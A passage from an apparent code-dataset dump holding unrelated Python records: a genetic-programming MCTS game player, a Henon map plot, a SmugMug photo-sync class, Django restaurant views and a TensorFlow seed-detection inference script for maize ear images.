if node has no children\r\n return self.AddChild(move, state)\r\n \r\n \r\n def Search(self, c_param, hasGPTree, GPTree):\r\n \"\"\"\r\n For the first half of the game use the UCB1 formula.\r\n Else, use GP to find an alternative to UCT \r\n \"\"\"\r\n # select the child chosen from the GP tree\r\n if hasGPTree:\r\n return GP_Search(self, c_param, hasGPTree, GPTree)\r\n # else, use normal UCT\r\n else:\r\n if self.playerSymbol == 1:\r\n # look for maximum output\r\n choice_weights = [c.Q + np.sqrt(c_param * np.log(self.visits) / c.visits) for c in self.child]\r\n return self.child[np.argmax(choice_weights)]\r\n else: \r\n # look for minimum output\r\n choice_weights = [c.Q - np.sqrt(c_param * np.log(self.visits) / c.visits) for c in self.child]\r\n return self.child[np.argmin(choice_weights)]\r\n\r\n\r\n\r\n \r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n\r\n\r\n\r\n\r\n\r\ndef GP_Search(RootNode, c_param, hasGPTree=False, GPTree=None):\r\n \"\"\"\r\n Find the best child from the given node\r\n \"\"\"\r\n \r\n state = RootNode.state # current game state\r\n \r\n # set the number of inputs - [Q,n,N,c]\r\n pset = gp.PrimitiveSet(\"MAIN\", 4)\r\n \r\n # Define new functions\r\n def div(left, right):\r\n if (abs(right) < 0.001):\r\n return 1\r\n else:\r\n return left/right\r\n \r\n # natural log\r\n def ln(left): \r\n if left == 1: left = 1.001\r\n if left < 0.01: left = 0.01\r\n return np.log(abs(left))\r\n \r\n # square root\r\n def root(left):\r\n return (abs(left))**(1/2)\r\n\r\n # add operators\r\n pset.addPrimitive(operator.add, 2)\r\n pset.addPrimitive(operator.sub, 2)\r\n pset.addPrimitive(operator.mul, 2)\r\n pset.addPrimitive(div, 2)\r\n pset.addPrimitive(operator.neg, 1)\r\n pset.addPrimitive(ln, 1)\r\n pset.addPrimitive(root, 1)\r\n\r\n # rename the arguments\r\n pset.renameArguments(ARG0='Q')\r\n pset.renameArguments(ARG1='n')\r\n pset.renameArguments(ARG2='N')\r\n pset.renameArguments(ARG3='c')\r\n \r\n # primitives and terminals list\r\n prims = pset.primitives[object]\r\n terminals = pset.terminals[object]\r\n \r\n # want to maximise the solution\r\n creator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\r\n # define the structure and the \r\n creator.create(\"Individual\", gp.PrimitiveTree, fitness=creator.FitnessMax) \r\n \r\n # register the generation functions into a Toolbox\r\n toolbox = base.Toolbox()\r\n toolbox.register(\"expr\", gp.genHalfAndHalf, pset=pset, min_=1, max_=5)\r\n toolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.expr)\r\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\r\n toolbox.register(\"compile\", gp.compile, pset=pset)\r\n\r\n\r\n def 
evalTree(individual, RootNode, state):\r\n # Transform the tree expression in a callable function\r\n func = toolbox.compile(expr=individual)\r\n isPlayer1 = (state.playerSymbol == 1)\r\n\r\n \r\n # from this point simulate the game 10 times appending the results\r\n SIMULATIONS = 10\r\n results = []\r\n for i in range(SIMULATIONS):\r\n # copy the state\r\n stateCopy = state.CloneState()\r\n node = RootNode\r\n \r\n # child nodes\r\n childNodes = node.child\r\n nodeValues = [[c.Q, c.visits, node.visits, c_param] for c in childNodes] # values of the nodes\r\n \r\n # get the values of the tree for each child node\r\n v = [func(Q,n,N,c) for Q,n,N,c in nodeValues]\r\n node = childNodes[np.argmax(v)] if isPlayer1 else childNodes[np.argmin(v)]\r\n \r\n # play the move of this child node\r\n stateCopy.move(node.Move.move)\r\n\r\n # shuffle deck\r\n stateCopy.shuffle()\r\n \r\n # random rollout\r\n while not stateCopy.isGameOver:\r\n m = stateCopy.getRandomMove()\r\n stateCopy.move(m.move)\r\n \r\n # result\r\n result = stateCopy.checkWinner()\r\n results.append(result)\r\n \r\n #Backpropogate\r\n while node != None: # backpropogate from the expected node and work back until reaches root_node\r\n node.UpdateNode(result,0)\r\n node = node.parent\r\n \r\n # semantics check \r\n individual.vector = results\r\n \r\n fitness = np.mean(results)\r\n # switch results for second player\r\n fitness = -fitness if (not isPlayer1) else fitness\r\n \r\n return fitness,\r\n \r\n\r\n \r\n # register gp functions\r\n toolbox.register(\"evaluate\", evalTree, RootNode=RootNode, state=state)\r\n toolbox.register(\"select\", selBestCustom)\r\n toolbox.register(\"mate\", gp.cxOnePoint)\r\n toolbox.register(\"expr_mut\", gp.genFull, min_=0, max_=3)\r\n toolbox.register(\"mutate\", gp.mutUniform, expr=toolbox.expr_mut, pset=pset)\r\n \r\n toolbox.decorate(\"mate\", gp.staticLimit(key=operator.attrgetter(\"height\"), max_value=8))\r\n toolbox.decorate(\"mutate\", gp.staticLimit(key=operator.attrgetter(\"height\"), max_value=5))\r\n \r\n # create tree for UCT\r\n UCT_formula = [ prims[0], terminals[0], prims[6], prims[3], prims[2], terminals[3], prims[5], terminals[2], terminals[1]]\r\n UCT_GP_Tree = creator.Individual(UCT_formula)\r\n \r\n # if MCTS already has a gpTree, return the values for each child\r\n if hasGPTree:\r\n playerSymbol = state.playerSymbol\r\n nodeValues = [[c.Q, c.visits, RootNode.visits, c_param] for c in RootNode.child]\r\n func = toolbox.compile(expr=GPTree)\r\n values = [func(Q,n,N,c) for Q,n,N,c in nodeValues]\r\n #print(\"(GPSeacrh - Returning optimal child\")\r\n if playerSymbol == 1:\r\n return RootNode.child[np.argmax(values)]\r\n else:\r\n return RootNode.child[np.argmin(values)]\r\n \r\n # else, find the optimal tree using GP \r\n else:\r\n \r\n MU, LAMBDA, NGEN = 1, 4, 20\r\n pop = [UCT_GP_Tree] # one formula in tree\r\n hof = tools.HallOfFame(1)\r\n \r\n stats_fit = tools.Statistics(lambda ind: ind.fitness.values)\r\n stats_size = tools.Statistics(len)\r\n mstats = tools.MultiStatistics(fitness=stats_fit, size=stats_size)\r\n mstats.register(\"avg\", np.mean)\r\n mstats.register(\"std\", np.std)\r\n mstats.register(\"min\", np.min)\r\n mstats.register(\"max\", np.max)\r\n \r\n pop, logbook = eaMuCommaLambdaCustom(pop, toolbox, mu=MU, lambda_=LAMBDA, \r\n cxpb=0, mutpb=1, ngen=NGEN, stats=mstats, halloffame=hof, verbose=False)\r\n # return the best tree\r\n #print(\"(GPSeacrh) - Returning best tree\")\r\n #print(str(hof[0]))\r\n return hof[0]\r\n \r\n \r\n\r\ndef 
eaMuCommaLambdaCustom(population, toolbox, mu, lambda_, cxpb, mutpb, ngen,\r\n stats=None, halloffame=None, verbose=__debug__):\r\n \"\"\"\r\n This is the :math:`(\\mu~,~\\lambda)` evolutionary algorithm\r\n \"\"\"\r\n assert lambda_ >= mu, \"lambda must be greater or equal to mu.\"\r\n\r\n # Evaluate the individuals with an invalid fitness\r\n invalid_ind = [ind for ind in population if not ind.fitness.valid]\r\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\r\n for ind, fit in zip(invalid_ind, fitnesses):\r\n ind.fitness.values = fit\r\n\r\n if halloffame is not None:\r\n halloffame.update(population)\r\n\r\n logbook = tools.Logbook()\r\n logbook.header = ['gen', 'nevals'] + (stats.fields if stats else [])\r\n\r\n record = stats.compile(population) if stats is not None else {}\r\n logbook.record(gen=0, nevals=len(invalid_ind), **record)\r\n if verbose:\r\n print(logbook.stream)\r\n\r\n # Begin the generational process\r\n for gen in range(1, ngen + 1):\r\n # Vary the population\r\n offspring = varOr(population, toolbox, lambda_, cxpb, mutpb)\r\n\r\n # Evaluate the individuals with an invalid fitness\r\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\r\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\r\n \r\n for ind, fit in zip(invalid_ind, fitnesses):\r\n ind.fitness.values = fit\r\n\r\n # Update the hall of fame with the generated individuals\r\n if halloffame is not None:\r\n halloffame.update(offspring)\r\n\r\n # Select the next generation population\r\n population[:] = toolbox.select(population + offspring, mu)\r\n #print(\"Best individual is %s, %s\" % (population[0], population[0].fitness.values))\r\n\r\n # Update the statistics with the new population\r\n record = stats.compile(population) if stats is not None else {}\r\n logbook.record(gen=gen, nevals=len(invalid_ind), **record)\r\n if verbose:\r\n print(logbook.stream)\r\n return population, logbook\r\n\r\n\r\ndef semanticsDistance(original, new):\r\n return sum((np.absolute(np.subtract(original.vector, new.vector))/len(new.vector)))\r\n\r\n\r\ndef selBestCustom(individuals, fit_attr=\"fitness\"):\r\n for i in individuals:\r\n i.SD = round(semanticsDistance(individuals[0], i), 3)\r\n \"\"\"\r\n ind_sorted = sorted(\r\n sorted(individuals, key=attrgetter(\"SD\"), reverse=True), \r\n key=attrgetter(\"fitness\"), reverse=True\r\n )\r\n \"\"\"\r\n ind_sorted = sorted(individuals, key=attrgetter(\"fitness\"), reverse=True)\r\n \r\n return ind_sorted[:1]\r\n \r\n\r\n\r\ndef varOr(population, toolbox, lambda_, cxpb, mutpb):\r\n \"\"\"\r\n Part of an evolutionary algorithm applying only the variation part\r\n (crossover, mutation **or** reproduction). The modified individuals have\r\n their fitness invalidated. 
The individuals are cloned so the returned\r\n population is independent of the input population.\r\n \"\"\"\r\n assert (cxpb + mutpb) <= 1.0, (\r\n \"The sum of the crossover and mutation probabilities must be smaller \"\r\n \"than or equal to 1.0.\")\r\n\r\n offspring = []\r\n for _ in range(lambda_):\r\n ind = toolbox.clone(random.choice(population))\r\n ind, = toolbox.mutate(ind)\r\n # make sure it's a new program\r\n while ind == population[0]:\r\n ind, = toolbox.mutate(ind)\r\n del ind.fitness.values\r\n offspring.append(ind)\r\n \r\n return offspring\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"MCTS_TREE_ES_Player.py","file_name":"MCTS_TREE_ES_Player.py","file_ext":"py","file_size_in_byte":19120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"177160499","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef henon(a=1.4,b=0.3,x=0.2,y=0.2):\r\n global lx,ly\r\n\r\n for i in range(1,3000):\r\n xnew = 1+y-a*x**2\r\n ynew = b*x\r\n #print(i,xnew,ynew)\r\n lx.append(xnew)\r\n ly.append(ynew)\r\n \r\n x =xnew\r\n y =ynew\r\n \r\n \r\n# initialize lists for plotting\r\nlx = []\r\nly = []\r\n\r\n#henon(0.8,0.3,0.2,0.2) #henon(a,b,x,y)\r\nhenon()\r\n\r\nplt.scatter(lx,ly, marker=\".\", alpha=0.2)\r\nplt.show()","sub_path":"henonFunction.py","file_name":"henonFunction.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"280115366","text":"import os\nimport requests\nfrom datetime import datetime\nfrom scanner import POLICY_DISK_RULES\nfrom scanner.objects import SyncObject, logger\nfrom scanner.picasa import PicasaDB\n\n\nclass Image(SyncObject):\n    def __init__(self, scanner, obj_id, smugmug_id=None, disk_path=None, picasa_caption=None, smugmug_caption=None):\n        super(Image, self).__init__(scanner, obj_id, smugmug_id, disk_path)\n        self.original_url = None\n        self.picasa_caption = picasa_caption\n        self.smugmug_caption = smugmug_caption\n        self.duplicated_images = []\n\n    @staticmethod\n    def create_from_disk(scanner, folder, name, developed_path=None):\n        \"\"\"\n        :type scanner: scan.Scanner\n        \"\"\"\n        image_disk_path = os.path.join(folder, name)\n        image_id = SyncObject.path_to_id(scanner.base_dir, image_disk_path)\n        picasa_caption = PicasaDB.instance().get_image_caption(folder, name)\n\n        # Now check if there is a developed version of this image. If there is, take its path instead of the original\n        if developed_path:\n            developed_version = os.path.join(developed_path, name)\n            if os.path.exists(developed_version):\n                image_disk_path = developed_version\n\n        return Image(scanner, image_id, disk_path=image_disk_path, picasa_caption=picasa_caption)\n\n    @staticmethod\n    def create_from_smugmug(scanner, image_id, image):\n        \"\"\" :type scanner: scan.Scanner \"\"\"\n        i = Image(scanner, image_id)\n        i.update_from_smugmug(image)\n        return i\n\n    def update_from_smugmug(self, image):\n        last_update = datetime.strptime(image['LastUpdated'], '%Y-%m-%d %H:%M:%S')\n        if self.smugmug_id is None:\n            self.smugmug_id = image['id']\n            self.original_url = image['OriginalURL']\n            self.online_last_updated = last_update\n            self.smugmug_caption = image['Caption']\n        else:\n            # Duplicated image on SmugMug!!! Delete older version\n            self.duplicated_images.append(image['id'])\n            logger.info('Duplicated image on SmugMug!!! 
Delete older version %s' % self.id)\n\n    def needs_sync(self):\n        # Check for upload, download, delete, metadata change\n        return super(Image, self).needs_sync() or self._metadata_needs_sync() or len(self.duplicated_images) > 0\n\n    def sync(self, policy):\n        if not self.on_smugmug():\n            self._upload()\n\n        if not self.on_disk():\n            if policy == POLICY_DISK_RULES:\n                # Delete the online version (as this was deleted from the disk)\n                logger.debug('--- Deleting image %s (%d)' % (self.id, self.smugmug_id))\n                self.smugmug.images_delete(ImageID=self.smugmug_id)\n                self.smugmug_id = None\n            else:\n                # Download the file to disk\n                self._download()\n\n        if self._metadata_needs_sync() and self.smugmug_id:\n            # TODO: This is not getting called yet...\n            logger.debug('--- Updating image\'s caption %s to %s' % (self, self.picasa_caption))\n            self.smugmug.images_changeSettings(ImageID=self.smugmug_id, Caption=self.picasa_caption)\n\n        if len(self.duplicated_images) > 0:\n            # Delete from online any duplicates of this photo (duplicates are identified by file name)\n            for smugmug_id in self.duplicated_images:\n                logger.debug('--- Deleting duplicated image %d' % smugmug_id)\n                self.smugmug.images_delete(ImageID=smugmug_id)\n\n            self.duplicated_images = []\n\n    def _upload(self):\n        upload = True\n\n        # Check if an upload is needed...\n        if self.online_last_updated:\n            disk_last_updated = datetime.fromtimestamp(os.path.getmtime(self.disk_path))\n            upload = disk_last_updated > self.online_last_updated\n\n        if upload:\n            # Need to delete existing images that need update\n            if self.on_smugmug():\n                logger.debug('--- Deleting image (for replacement) %s' % self.id)\n                self.smugmug.images_delete(ImageID=self.smugmug_id)\n                self.smugmug_id = None\n\n            logger.debug('--- Uploading image %s' % self)\n            self.smugmug.images_upload(File=self.disk_path, AlbumID=self.get_parent_smugmug_id())\n\n    def _metadata_needs_sync(self):\n        # TODO: Not working!!!\n        if self.picasa_caption and self.picasa_caption != self.smugmug_caption:\n            return True\n\n        # TODO: Add check for other meta-data attributes here...\n        return False\n\n    def _download(self):\n        self.disk_path = SyncObject.id_to_path(self.scanner.base_dir, self.id)\n        r = requests.get(self.original_url)\n        with open(self.disk_path, 'wb') as f:\n            for chunk in r.iter_content(chunk_size=512 * 1024):\n                # filter out keep-alive new chunks\n                if chunk:\n                    f.write(chunk)\n\n    @staticmethod\n    def is_image(f):\n        _, ext = os.path.splitext(f)\n        # Unknown file types: '.3gp',\n        return ext.lower() in ['.jpg', '.jpeg', '.avi', '.mv4', '.mov', '.mp4', '.mts']\n","sub_path":"scanner/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"131204009","text":"from django.shortcuts import render\n\n# Create your views here.\nimport json\nfrom django.shortcuts import render_to_response, redirect, render\n\nrest_list = []\n'''\ndef parseFIle(filename):\n    file = open(\"Phone.json\", \"r\")\n    phones = json.load(file);\n    print (phones)\n    for i in phones:\n        phone_list.append(Phone().parseFromDict(i))\n    file.close()\n    print(phone_list)\nparseFIle(\"Phone.json\")\n'''\n\ndef getJson(filename):\n    # load and return the parsed JSON from the given file\n    file = open(filename, \"r\")\n    rest = json.load(file)\n    file.close()\n    return rest\n\ndef show(request):\n    rest = getJson(\"Restaurants.json\")\n    return render(request, \"all.html\", {'rest': rest})\n\ndef get(request, path):\n    rests = getJson(\"Restaurants.json\")\n    rest = {}\n    for i in rests:\n        if i['id'] == 
int(path):\n            rest = i\n            break\n    return render(request, \"restaurant.html\", {'rest': rest})\n","sub_path":"courses/OWP/lab3/lab3/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"462067125","text":"#!/usr/bin/env python3\n\n#########################################################\n# EarVision\n#\n# Copyright 2020\n#\n# Cedar Warman\n# Michaela E. Buchanan\n# Christopher M. Sullivan\n# Justin Preece\n# Pankaj Jaiswal\n# John Fowler\n# \n#\n# Department of Botany and Plant Pathology\n# Center for Genome Research and Biocomputing\n# Oregon State University\n# Corvallis, OR 97331\n#\n# fowlerj@science.oregonstate.edu\n#\n# This program is not free software; you can not redistribute it and/or\n# modify it at all.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n#\n#########################################################\n\n\"\"\"\nThis version will implement overlap in image subdivisions and non-maximum\nsuppression. Eventually it will replace the other version, but for now there\nare two in case I break this one.\n\ntensorflow_predict.py\nAdapted from:\nhttps://colab.research.google.com/github/Tony607/object_detection_demo/blob/master/tensorflow_object_detection_training_colab.ipynb#scrollTo=mz1gX19GlVW7\n\nUsage (note: I've been running this on an Nvidia GPU with Tensorflow 1.12-GPU \nin a conda virtual environment):\n\nbash; conda activate tf1.12-gpu; python tensorflow_predict.py \n    -c \n    -l \n    -d \n    -o \n    -m \n    -s \n    -n \n\"\"\"\n\nimport os\nimport glob\n\nimport numpy as np\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport csv\nimport argparse\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport pyfiglet\n\n# Setting up arguments\nparser = argparse.ArgumentParser(description='Splits labels')\nparser.add_argument('-d',\n                    '--test_image_dir',\n                    type=str,\n                    help=('Path to test image directory'),\n                    required=True)\nparser.add_argument('-c', \n                    '--checkpoint',\n                    type=str,\n                    default='./data/default_checks/model.ckpt-50000',\n                    help=('Path to frozen detection graph (checkpoint)'))\nparser.add_argument('-l',\n                    '--labels',\n                    type=str,\n                    default='./utils/training/data/label_map.pbtxt',\n                    help=('Path to class label map'))\nparser.add_argument('-o',\n                    '--output_path',\n                    type=str,\n                    default='./output/inference',\n                    help=('Path to output directory'))\nparser.add_argument('-m',\n                    '--model_path',\n                    type=str,\n                    default='./seed_models/research/',\n                    help=('Path to object detection model directory'))\nparser.add_argument('-s',\n                    '--min_score_threshold',\n                    type=float,\n                    default=0.05,\n                    help=('Minimum score threshold for plotting bounding boxes'))\nparser.add_argument('-n',\n                    '--image_split_num',\n                    type=int,\n                    default=1,\n                    help=('Number of image subdivisions to run the object detection on.'))\nparser.add_argument('-w',\n                    '--overlap_width',\n                    type=int,\n                    default=100,\n                    help=('Pixel overlap width for image subdivisions.'))\nargs = parser.parse_args()\n\n\"\"\" \nSetting up environment variables for the object detection model\n\"\"\"\n\n# handle leading / on input path\nnewPath = args.model_path\n\nif newPath[0] == '/':\n    newPath = newPath[1:]\n\nnetsPath = newPath + \"/tf_slim\"\n\n# create new 
path\nsys.path.append(newPath) \nsys.path.append(netsPath)\n\n\"\"\"\nPretty banner \n\"\"\"\n\nascii_banner = pyfiglet.figlet_format(\"Seed Project Inference Tool\")\nprint(ascii_banner)\n\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\n# for exporting model \n\nimport tensorflow as tf\nfrom google.protobuf import text_format\nfrom object_detection import exporter\nfrom object_detection.protos import pipeline_pb2\nslim = tf.contrib.slim\n\n# export model \n\npipeline_config = pipeline_pb2.TrainEvalPipelineConfig()\nwith tf.gfile.GFile(\"./utils/training/train.config\", 'r') as f:\n    text_format.Merge(f.read(), pipeline_config)\n# text_format.Merge(FLAGS.config_override, \"./utils/training/train.config\")\n# if input_shape:\n#     input_shape = [\n#         int(dim) if dim != '-1' else None\n#         for dim in FLAGS.input_shape.split(',')\n#     ]\n# else:\ninput_shape = None\nexporter.export_inference_graph(\n    \"image_tensor\", pipeline_config, args.checkpoint,\n    args.output_path, input_shape=input_shape)\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = \"./output/inference/frozen_inference_graph.pb\"\n\n# List of the strings that are used to add the correct label for each box.\nPATH_TO_LABELS = args.labels\n\n# If you want to test the code with your images, just add image files to the PATH_TO_TEST_IMAGES_DIR.\nPATH_TO_TEST_IMAGES_DIR = args.test_image_dir\n\nassert os.path.isfile(PATH_TO_CKPT)\nassert os.path.isfile(PATH_TO_LABELS)\nTEST_IMAGE_PATHS = glob.glob(os.path.join(PATH_TO_TEST_IMAGES_DIR, \"*.*\"))\nassert len(TEST_IMAGE_PATHS) > 0, 'No image found in `{}`.'.format(PATH_TO_TEST_IMAGES_DIR)\n\n# Importing the frozen inference graph\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n    od_graph_def = tf.GraphDef()\n    with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n        serialized_graph = fid.read()\n        od_graph_def.ParseFromString(serialized_graph)\n        tf.import_graph_def(od_graph_def, name='')\n\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(\n    label_map, max_num_classes=2, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n# Loading the images\ndef load_image_into_numpy_array(image):\n    (im_width, im_height) = image.size\n    print(im_width)\n    print(im_height)\n    return np.array(image.getdata()).reshape(\n        (im_height, im_width, 3)).astype(np.uint8)\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\n# A really complicated function to get the split sections, with overlap\ndef get_splits(image_width, split_number, overlap):\n\n    image_splits = []\n    total_image_width = image_width\n    overlap_width = overlap\n\n    if args.image_split_num == 1:\n        image_splits.append([0, total_image_width]) \n\n    # This will be the most used case, as of now, with a split of 3 sub-images.\n    # In this case, since a lot of the ear images have significant space on the\n    # left and right, I want the center sub-image to not be too big. To avoid\n    # this, I'll do the overlaps from the left and right images and leave the\n    # center image unchanged. \n    elif args.image_split_num == 3:\n        # Here's the split width if there's no overlap (note: probably will\n        # need to do something about rounding errors here with certain image\n        # widths).\n        no_overlap_width = int(total_image_width / split_number)\n        \n        # Left split. 
The left side of the left split will always be zero.\n        left_split = []\n        left_split.append(0)\n\n        # The other side of the left split is the no-overlap width plus\n        # the overlap\n        left_split.append(no_overlap_width + overlap_width)\n        image_splits.append(left_split)\n\n        # The middle has no overlap in this case\n        middle_split = []\n        middle_split.append(no_overlap_width)\n        middle_split.append(no_overlap_width * 2)\n        image_splits.append(middle_split)\n\n        # The right split is the opposite of the left split\n        right_split = []\n        right_split.append((2 * no_overlap_width) - overlap_width)\n        right_split.append(total_image_width)\n        image_splits.append(right_split)\n\n    else:\n        # If the split is not 1 or 3, this more general overlap setup happens,\n        # with overlaps on all boundaries.\n        no_overlap_width = int(total_image_width / split_number)\n\n        # Left split\n        left_split = []\n        left_split.append(0)\n        left_split.append(no_overlap_width + overlap_width)\n        image_splits.append(left_split)\n\n        # Middle splits (the minus 2 is because the left and right sides are\n        # handled separately)\n        for split_position in range(1, (split_number - 1)): \n            middle_split = []\n            left_middle_split = (no_overlap_width * split_position) - overlap_width\n            right_middle_split = (no_overlap_width * (split_position + 1)) + overlap_width\n            middle_split.append(left_middle_split)\n            middle_split.append(right_middle_split)\n            image_splits.append(middle_split)\n\n        # Right split\n        right_split = []\n        right_split.append((no_overlap_width * (split_number - 1)) - overlap_width)\n        right_split.append(total_image_width)\n        image_splits.append(right_split)\n\n    return(image_splits)\n    \n\n# The function that actually splits the images\ndef split_image(image_np_array, split_list):\n    print(image_np_array.shape)\n    array_list = []\n\n    for split_nums in split_list:\n        left_border = int(split_nums[0])\n        right_border = int(split_nums[1])\n        print(\"Borders:\")\n        print(left_border)\n        print(right_border)\n        sub_array = image_np_array[:,left_border:right_border,:]\n        array_list.append(sub_array)\n\n    return(array_list)\n\n\ndef run_inference_for_single_image(image, graph):\n    with graph.as_default():\n        with tf.Session() as sess:\n            # Get handles to input and output tensors\n            ops = tf.get_default_graph().get_operations()\n            all_tensor_names = {\n                output.name for op in ops for output in op.outputs}\n            tensor_dict = {}\n            for key in [\n                'num_detections', 'detection_boxes', 'detection_scores',\n                'detection_classes', 'detection_masks'\n            ]:\n                tensor_name = key + ':0'\n                if tensor_name in all_tensor_names:\n                    tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n                        tensor_name)\n            if 'detection_masks' in tensor_dict:\n                # The following processing is only for single image\n                detection_boxes = tf.squeeze(\n                    tensor_dict['detection_boxes'], [0])\n                detection_masks = tf.squeeze(\n                    tensor_dict['detection_masks'], [0])\n                # Reframe is required to translate mask from box coordinates \n                # to image coordinates and fit the image size.\n                real_num_detection = tf.cast(\n                    tensor_dict['num_detections'][0], tf.int32)\n                detection_boxes = tf.slice(detection_boxes, [0, 0], [\n                    real_num_detection, -1])\n                detection_masks = tf.slice(detection_masks, [0, 0, 0], [\n                    real_num_detection, -1, -1])\n                detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n                    detection_masks, detection_boxes, image.shape[0], image.shape[1])\n                detection_masks_reframed = tf.cast(\n                    tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n                # Follow the convention by adding back the batch 
dimension\n tensor_dict['detection_masks'] = tf.expand_dims(\n detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(\n output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\n# This function is for getting out the total number of fluorescent and\n# nonfluorescent boxes detected from an output_dict. \ndef get_object_counts(output_dict, min_score):\n detection_classes = output_dict['detection_classes']\n detection_scores = output_dict['detection_scores']\n\n total_fluorescent = 0\n total_nonfluorescent = 0\n\n for i in range(len(detection_scores)):\n detect_class = detection_classes[i]\n detect_score = detection_scores[i]\n if detect_score > min_score:\n if detect_class == 1:\n total_fluorescent = total_fluorescent + 1\n if detect_class == 2:\n total_nonfluorescent = total_nonfluorescent + 1\n\n output_list = [total_fluorescent, total_nonfluorescent]\n return(output_list)\n\n# This function is for saving a file with more detailed information about the\n# bounding boxes and confidence scores\ndef get_boxes_and_scores(output_dict, image_name_string):\n image_name = image_name_string\n detection_boxes = output_dict['detection_boxes']\n detection_scores = output_dict['detection_scores']\n detection_classes = output_dict['detection_classes']\n\n x_min_list = []\n x_max_list = []\n y_min_list = []\n y_max_list = []\n score_list = []\n class_list = []\n name_list = []\n\n for i in range(len(detection_scores)):\n x_min = detection_boxes[i][1]\n x_max = detection_boxes[i][3]\n y_min = detection_boxes[i][0]\n y_max = detection_boxes[i][2]\n score = detection_scores[i]\n class_num = detection_classes[i]\n\n x_min_list.append(x_min)\n x_max_list.append(x_max)\n y_min_list.append(y_min)\n y_max_list.append(y_max)\n score_list.append(score)\n class_list.append(class_num)\n name_list.append(image_name)\n\n output_list = [x_min_list,\n x_max_list,\n y_min_list,\n y_max_list,\n score_list,\n class_list,\n name_list]\n\n return(output_list)\n \n\n# This function removes the boxes that are near the edges of the splits, in an\n# attempt to remove boxes that are only a fraction of a seed.\ndef remove_edge_boxes(output_dict, list_of_splits, image_position):\n output_dict_boxes_removed = output_dict\n # This is how close the edge of a box can be to the edge of the sub-image\n # before they get deleted\n edge_crop_width = 40\n image_width = list_of_splits[-1][1]\n relative_edge_crop_width = edge_crop_width / image_width\n #print(\"relative_edge_crop_width is: \")\n #print(relative_edge_crop_width)\n\n array_counter = 0\n delete_list = []\n\n # Pulling out the elements of the output_dict that will get modified\n adjusted_boxes = output_dict['detection_boxes']\n adjusted_scores = output_dict['detection_scores']\n adjusted_classes = output_dict['detection_classes']\n\n # On the leftmost set of boxes, only ones near the right side will be\n # deleted\n if image_position == 0:\n print(\"\\n\\nleft image\")\n 
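# (added note, illustrative) box coordinates here are normalised to [0, 1] within this sub-image,\n        # so with, say, a 1200 px wide sub-image and edge_crop_width = 40, boxes whose right edge\n        # lies past 1 - 40/1200 ≈ 0.967 sit in the overlap strip and are dropped below.\n        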
for box in adjusted_boxes:\n xmax = box[3] \n if xmax > (1 - relative_edge_crop_width):\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n\n # Rightmost set\n elif image_position == (len(list_of_splits) - 1):\n print(\"\\n\\nright image\")\n for box in adjusted_boxes:\n xmin = box[1] \n if xmin < relative_edge_crop_width:\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n\n # All the middle sets\n else:\n print(\"\\n\\nmiddle image\")\n for box in adjusted_boxes:\n xmax = box[3] \n xmin = box[1] \n if (xmin < relative_edge_crop_width) or (xmax > (1 - relative_edge_crop_width)):\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = 